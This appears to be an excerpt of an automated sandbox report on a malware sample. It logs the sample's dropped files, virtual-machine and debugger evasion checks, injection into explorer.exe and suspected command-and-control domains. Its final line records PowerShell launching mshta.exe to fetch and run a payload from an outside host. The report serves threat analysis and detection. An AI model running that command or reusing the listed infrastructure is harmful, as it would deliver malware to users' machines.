            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeAPI/Special instruction interceptor: Address: 6BE07C44
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeAPI/Special instruction interceptor: Address: 6C547C44
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeAPI/Special instruction interceptor: Address: 6C547945
            Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C543B54
            Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 91A317
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1592Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1701Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5018Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4834Jump to behavior
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraChrome\python27.dllJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeDropped PE file which has not been started: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\python27.dllJump to dropped file
            Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Headerfrontend[1]Jump to dropped file
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraChrome\msvcr90.dllJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeDropped PE file which has not been started: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\msvcr90.dllJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeDropped PE file which has not been started: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\Gloom.dllJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ryuvnpJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeEvaded block: after key decision
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeEvaded block: after key decision
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeEvasive API call chain: GetLocalTime,DecisionNodes
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeAPI coverage: 10.0 %
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeAPI coverage: 0.3 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 4124Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe TID: 1732Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6520Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6576Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009DFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 009DFF61h16_2_009DFEC6
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009DFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 009DFF5Ah16_2_009DFEC6
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0026FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0026FF61h17_2_0026FEC6
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0026FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0026FF5Ah17_2_0026FEC6
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009A3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,16_2_009A3CC4
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009E4440 FindFirstFileW,FindClose,16_2_009E4440
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009B9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,16_2_009B9B43
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00274440 FindFirstFileW,FindClose,17_2_00274440
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00249B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,17_2_00249B43
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00233CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,17_2_00233CC4
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009E97A5 VirtualQuery,GetSystemInfo,16_2_009E97A5
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeThread delayed: delay time: 30000
            Source: pyexec.exe, 00000013.00000002.2349529322.0000000008735000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
            Source: explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
            Source: explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
            Source: explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
            Source: mshta.exe, 00000004.00000002.2245517191.000001C8462ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2245031576.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2236314114.000001C8462ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2228118175.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2218602445.000001C8462ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2998640070.000001EFFC459000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2997288458.000001EFFAC2B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570257382.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570985206.00000000033CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
            Source: explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
            Source: explorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570985206.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572182630.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHW2
            Source: powershell.exe, 00000006.00000002.2205028532.000001EF78369000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.S%SystemRoot%\system32\mswsock.dll-
            Source: explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
            Source: powershell.exe, 00000006.00000002.2205028532.000001EF78382000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware
            Source: mshta.exe, 00000004.00000003.2228118175.000001C846251000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2245031576.000001C846251000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: pyexec.exe, 00000013.00000002.2349529322.0000000008735000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mvmware
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009CE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_009CE88A
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_10042400 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_10042400
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009D48D8 mov eax, dword ptr fs:[00000030h]16_2_009D48D8
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_002648D8 mov eax, dword ptr fs:[00000030h]17_2_002648D8
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009A394F GetProcessHeap,RtlAllocateHeap,16_2_009A394F
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009CE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_009CE3D8
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009CE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_009CE88A
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009CE9DC SetUnhandledExceptionFilter,16_2_009CE9DC
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009D3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_009D3C76
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0025E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0025E3D8
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0025E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0025E88A
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0025E9DC SetUnhandledExceptionFilter,17_2_0025E9DC
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00263C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00263C76
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1003D60A SetUnhandledExceptionFilter,17_2_1003D60A
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1003D61C SetUnhandledExceptionFilter,17_2_1003D61C
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_004030A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,18_2_004030A8
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_00402CAD SetUnhandledExceptionFilter,18_2_00402CAD
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_6C258908 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,18_2_6C258908

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.59.81 443
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeNtSetInformationThread: Direct from: 0x6BAE5790
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeNtQuerySystemInformation: Direct from: 0x401CF4
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6160 base: 9179C0 value: 55
            Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6160 base: 2FDB008 value: 00
            Source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
            Source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
            Source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
            Source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
            Source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
            Source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: passworoggre.click
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9179C0
            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2FDB008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://naubeautylus.ch/HeaderfrontendJump to behavior
